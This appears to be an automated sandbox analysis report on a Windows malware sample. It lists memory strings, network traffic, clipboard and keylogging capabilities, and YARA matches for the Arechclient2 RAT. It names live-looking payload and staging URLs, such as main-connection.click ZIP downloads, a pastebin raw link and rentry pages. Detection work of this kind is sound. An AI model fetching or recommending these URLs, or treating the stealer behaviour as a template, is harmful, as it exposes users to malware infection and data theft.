Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.symauth.com/rpa00
Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.vmware.com/0
Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.vmware.com/0/
Source: MSBuild.exe, 0000000E.00000002.2497394754.0000000002969000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002B72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org?q=
Source: powershell.exe, 00000001.00000002.1556343384.0000022CB0481000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000001.00000002.1556343384.0000022CB096C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: MSBuild.exe, 0000000E.00000002.2497394754.0000000002969000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002B72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: powershell.exe, 00000001.00000002.1556343384.0000022CB1D2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1556343384.0000022CB090B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1556343384.0000022CB1BAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1556343384.0000022CB086A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn4.buysellads.net/pub/rentryorg.js?
Source: MSBuild.exe, 0000000E.00000002.2497394754.0000000002969000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002B72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: MSBuild.exe, 0000000E.00000002.2497394754.0000000002969000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002B72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000001.00000002.1580242544.0000022CC04F4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.1580242544.0000022CC04F4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.1580242544.0000022CC04F4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://d.symcb.com/cps0%
Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://d.symcb.com/rpa0
Source: MSBuild.exe, 0000000E.00000002.2497394754.0000000002969000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002B72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: MSBuild.exe, 0000000E.00000002.2497394754.0000000002969000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002B72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: MSBuild.exe, 0000000E.00000002.2497394754.0000000002969000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002B72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: MSBuild.exe, 0000000E.00000002.2497394754.0000000002969000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002B72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gemini.google.com/app?q=
Source: powershell.exe, 00000001.00000002.1556343384.0000022CB06AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1556343384.0000022CB228E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1556343384.0000022CB2310000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000001.00000002.1584358339.0000022CC86F7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://go.microsoft.co
Source: isscint.dll.9.dr, AUpdate.exe.9.dr, ISCmplr.dll.9.dr String found in binary or memory: https://jrsoftware.org/
Source: AUpdate.exe, 0000000B.00000000.1554247133.0000000000401000.00000020.00000001.01000000.00000009.sdmp, AUpdate.exe.9.dr String found in binary or memory: https://jrsoftware.org/isdonate.phpopenj
Source: AUpdate.exe, 0000000B.00000000.1554247133.0000000000401000.00000020.00000001.01000000.00000009.sdmp, AUpdate.exe.9.dr String found in binary or memory: https://jrsoftware.org/isinfo.phpopen
Source: AUpdate.exe, 0000000B.00000000.1554247133.0000000000401000.00000020.00000001.01000000.00000009.sdmp, AUpdate.exe.9.dr String found in binary or memory: https://jrsoftware.org/ismail.phpopenU
Source: isscint.dll.9.dr, AUpdate.exe.9.dr, ISCmplr.dll.9.dr String found in binary or memory: https://jrsoftware.org0
Source: powershell.exe, 00000001.00000002.1556343384.0000022CB1131000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1556343384.0000022CB1E26000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1556343384.0000022CB090B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://main-connection.click
Source: powershell.exe, 00000001.00000002.1556343384.0000022CB090B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://main-connection.click/Download_StarW3_pack.zip
Source: powershell.exe, 00000001.00000002.1556343384.0000022CB090B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://main-connection.click/Download_StarW3_pack.zip8
Source: powershell.exe, 00000001.00000002.1556343384.0000022CB1BAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://main-connection.click/archive.
Source: powershell.exe, 00000001.00000002.1556343384.0000022CB086A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://main-connection.click/archive.zip
Source: powershell.exe, 00000001.00000002.1556343384.0000022CB1E26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://main-connection.clickp
Source: powershell.exe, 00000001.00000002.1580242544.0000022CC04F4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: MSBuild.exe, 00000014.00000002.2074279644.0000000003131000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://pastebin.com/raw/DWCCqGB0
Source: MSBuild.exe, 00000014.00000002.2074279644.0000000003131000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://pastebin.com/raw/DWCCqGB0PO
Source: powershell.exe, 00000001.00000002.1556343384.0000022CB1D2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1556343384.0000022CB090B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://rentry.co/0xf6EA7bF5d089F439Ec6e7010101a88579d0Caa862d4EE0
Source: powershell.exe, 00000001.00000002.1556343384.0000022CB1BAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://rentry.co/0xf6EA7bF5d089F439Ec6e7a131388579d0Caa862d4EE0
Source: powershell.exe, 00000001.00000002.1556343384.0000022CB1D2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1556343384.0000022CB090B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://rentry.co/0xf6ea7bf5d089f439ec6e7010101a88579d0caa862d4ee0
Source: powershell.exe, 00000001.00000002.1556343384.0000022CB1BAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://rentry.co/0xf6ea7bf5d089f439ec6e7a131388579d0caa862d4ee0
Source: powershell.exe, 00000001.00000002.1556343384.0000022CB1BAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://rentry.co/static/icons/512.png
Source: powershell.exe, 00000001.00000002.1556343384.0000022CB1D2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1556343384.0000022CB1BAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://rentry.o
Source: powershell.exe, 00000001.00000002.1556343384.0000022CB06AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1556343384.0000022CB1CB7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://rentry.org
Source: powershell.exe, 00000001.00000002.1556343384.0000022CB1D2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1556343384.0000022CB1BAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://rentry.org/
Source: powershell.exe, 00000001.00000002.1556343384.0000022CB06AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1556343384.0000022CB1CB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1556343384.0000022CB0481000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://rentry.org/0xf6EA7bF5d089F439Ec6e7010101a88579d0Caa862d4EE0
Source: powershell.exe, 00000001.00000002.1556343384.0000022CB06AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1556343384.0000022CB0481000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://rentry.org/0xf6EA7bF5d089F439Ec6e7a131388579d0Caa862d4EE0
Source: AUpdate.exe.9.dr, ISCmplr.dll.9.dr String found in binary or memory: https://sectigo.com/CPS0
Source: isscint.dll.9.dr String found in binary or memory: https://sectigo.com/CPS0D
Source: isscint.dll.9.dr, AUpdate.exe.9.dr, ISCmplr.dll.9.dr String found in binary or memory: https://www.certum.pl/CPS0
Source: AUpdate.exe, 0000000B.00000002.1625640518.00000000098D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806880293.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: MSBuild.exe, 0000000E.00000002.2497394754.0000000002969000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002B72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: MSBuild.exe, 0000000E.00000002.2497394754.0000000002969000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.0000000002B72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: powershell.exe, 00000001.00000002.1556343384.0000022CB1D2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1556343384.0000022CB090B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1556343384.0000022CB1BAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-LLFSDKZXET
Source: powershell.exe, 00000001.00000002.1585418830.0000022CC88C8000.00000004.00000020.00020000.00000000.sdmp, AUpdate.exe, 0000000B.00000000.1554584495.0000000000657000.00000002.00000001.01000000.00000009.sdmp, AUpdate.exe, 0000000B.00000002.1618449030.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmp, AUpdate.exe.9.dr, ISCmplr.dll.9.dr String found in binary or memory: https://www.innosetup.com
Source: AUpdate.exe, 0000000B.00000000.1554247133.0000000000401000.00000020.00000001.01000000.00000009.sdmp, AUpdate.exe.9.dr String found in binary or memory: https://www.innosetup.com/
Source: AUpdate.exe, 0000000B.00000000.1554247133.0000000000401000.00000020.00000001.01000000.00000009.sdmp, AUpdate.exe.9.dr String found in binary or memory: https://www.remobjects.com/ps
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown HTTPS traffic detected: 164.132.58.105:443 -> 192.168.2.4:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49718 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_01624354 OpenClipboard,EmptyClipboard,MultiByteToWideChar,MultiByteToWideChar,WideCharToMultiByte,GlobalUnlock,SetClipboardData,GlobalUnlock,GlobalUnlock,SetClipboardData,SetClipboardData,SetClipboardData,CloseClipboard, 11_2_01624354
Contains functionality to modify clipboard data
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_01624354 OpenClipboard,EmptyClipboard,MultiByteToWideChar,MultiByteToWideChar,WideCharToMultiByte,GlobalUnlock,SetClipboardData,GlobalUnlock,GlobalUnlock,SetClipboardData,SetClipboardData,SetClipboardData,CloseClipboard, 11_2_01624354
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_016238EB OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,GetClipboardData,GlobalLock,GlobalSize,WideCharToMultiByte,WideCharToMultiByte,GetClipboardData,GlobalLock,GlobalSize,MultiByteToWideChar,GlobalUnlock,CloseClipboard, 11_2_016238EB
Potential key logger detected (key state polling based)
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_01621D06 __ehhandler$?_Init@?$numpunct@G@std@@IAEXABV_Locinfo@2@_N@Z,__EH_prolog3_catch_GS,IsChild,GetDlgCtrlID,SystemParametersInfoA,RegisterDragDrop,GetCursorPos,ScreenToClient,SystemParametersInfoA,ClientToScreen,IsWindowUnicode,WideCharToMultiByte,GetKeyState,GetKeyState,GetKeyState,GetCapture,SendMessageA,ImmGetContext,ImmNotifyIME,ImmReleaseContext,SetFocus,GetKeyState,GetMessageTime,GetMessageTime,DefWindowProcA,MsgWaitForMultipleObjects,GetTickCount,PostMessageA,SetFocus, 11_2_01621D06
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_01621D06 __ehhandler$?_Init@?$numpunct@G@std@@IAEXABV_Locinfo@2@_N@Z,__EH_prolog3_catch_GS,IsChild,GetDlgCtrlID,SystemParametersInfoA,RegisterDragDrop,GetCursorPos,ScreenToClient,SystemParametersInfoA,ClientToScreen,IsWindowUnicode,WideCharToMultiByte,GetKeyState,GetKeyState,GetKeyState,GetCapture,SendMessageA,ImmGetContext,ImmNotifyIME,ImmReleaseContext,SetFocus,GetKeyState,GetMessageTime,GetMessageTime,DefWindowProcA,MsgWaitForMultipleObjects,GetTickCount,PostMessageA,SetFocus, 11_2_01621D06

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 20.2.MSBuild.exe.1000000.0.unpack, type: UNPACKEDPE Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 16.2.cmd.exe.2da00c8.0.unpack, type: UNPACKEDPE Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 12.2.cmd.exe.59500c8.8.unpack, type: UNPACKEDPE Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 16.2.cmd.exe.2da00c8.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 12.2.cmd.exe.59500c8.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\vpdcuvm, type: DROPPED Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\bmrmmwsgmayisp, type: DROPPED Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Drops password protected ZIP file
Source: fe387de893ce4f2ca49f16029d364dc1.1.dr Zip Entry: encrypted
Source: fe387de893ce4f2ca49f16029d364dc1.1.dr Zip Entry: encrypted
Source: fe387de893ce4f2ca49f16029d364dc1.1.dr Zip Entry: encrypted
Source: fe387de893ce4f2ca49f16029d364dc1.1.dr Zip Entry: encrypted
Source: fe387de893ce4f2ca49f16029d364dc1.1.dr Zip Entry: encrypted
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Jump to dropped file
Contains functionality to communicate with device drivers
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_008EAB10: DeviceIoControl,DeviceIoControl,DeviceIoControl,DeviceIoControl, 9_2_008EAB10
Detected potential crypto function
Source: C:\Users\user\Desktop\zkwindow.exe Code function: 0_2_00007FF7013C8B50 0_2_00007FF7013C8B50
Source: C:\Users\user\Desktop\zkwindow.exe Code function: 0_2_00007FF7013D24D8 0_2_00007FF7013D24D8
Source: C:\Users\user\Desktop\zkwindow.exe Code function: 0_2_00007FF7013D44C4 0_2_00007FF7013D44C4
Source: C:\Users\user\Desktop\zkwindow.exe Code function: 0_2_00007FF7013D4648 0_2_00007FF7013D4648
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFC3D8F53F8 1_2_00007FFC3D8F53F8
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_0093A306 9_2_0093A306
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_008E8624 9_2_008E8624
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_0092086B 9_2_0092086B
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_0090EC38 9_2_0090EC38
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_008F91BC 9_2_008F91BC
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_009111AC 9_2_009111AC
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_0091F2B5 9_2_0091F2B5
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_00999780 9_2_00999780
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_0097BAF4 9_2_0097BAF4
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_00911F38 9_2_00911F38
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_00972078 9_2_00972078
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_009AA060 9_2_009AA060
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_009621AC 9_2_009621AC
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_009021AC 9_2_009021AC
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_009A41C0 9_2_009A41C0
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_009BE360 9_2_009BE360
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_009C84B0 9_2_009C84B0
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_009BA450 9_2_009BA450
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_0097444C 9_2_0097444C
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_0095A47C 9_2_0095A47C
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_0094E508 9_2_0094E508
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_00936529 9_2_00936529
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_009BC520 9_2_009BC520
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_009B26D0 9_2_009B26D0
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_009926F0 9_2_009926F0
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_0096C600 9_2_0096C600
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_009C8710 9_2_009C8710
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_009C8740 9_2_009C8740
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_009B0770 9_2_009B0770
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_009C8890 9_2_009C8890
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_009C88A0 9_2_009C88A0
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_0098A8FC 9_2_0098A8FC
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_0090880C 9_2_0090880C
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_00940808 9_2_00940808
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_009C6900 9_2_009C6900
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_009A0940 9_2_009A0940
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_00902AE8 9_2_00902AE8
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_009B4AE0 9_2_009B4AE0
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_008E8B98 9_2_008E8B98
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_00956D20 9_2_00956D20
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_00930D60 9_2_00930D60
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_009AAE90 9_2_009AAE90
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_0096EEFC 9_2_0096EEFC
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_00986E18 9_2_00986E18
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_009B4E40 9_2_009B4E40
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_0096AF4C 9_2_0096AF4C
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_009BCF70 9_2_009BCF70
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_0094108C 9_2_0094108C
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_009C5010 9_2_009C5010
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_009A1020 9_2_009A1020
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_009AB020 9_2_009AB020
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_009971E0 9_2_009971E0
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_008ED108 9_2_008ED108
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_0090710C 9_2_0090710C
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_0094D124 9_2_0094D124
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_00935148 9_2_00935148
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_009952A0 9_2_009952A0
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_009572D8 9_2_009572D8
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_009B92E0 9_2_009B92E0
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_008F7200 9_2_008F7200
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_009CB230 9_2_009CB230
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_009693B0 9_2_009693B0
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_009C53F0 9_2_009C53F0
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_00973364 9_2_00973364
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_009B5480 9_2_009B5480
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_009054E8 9_2_009054E8
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_0098740C 9_2_0098740C
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_009B7580 9_2_009B7580
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_009415B8 9_2_009415B8
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_00919544 9_2_00919544
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_0097F578 9_2_0097F578
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_0095D6A8 9_2_0095D6A8
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_009C7650 9_2_009C7650
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_009BD640 9_2_009BD640
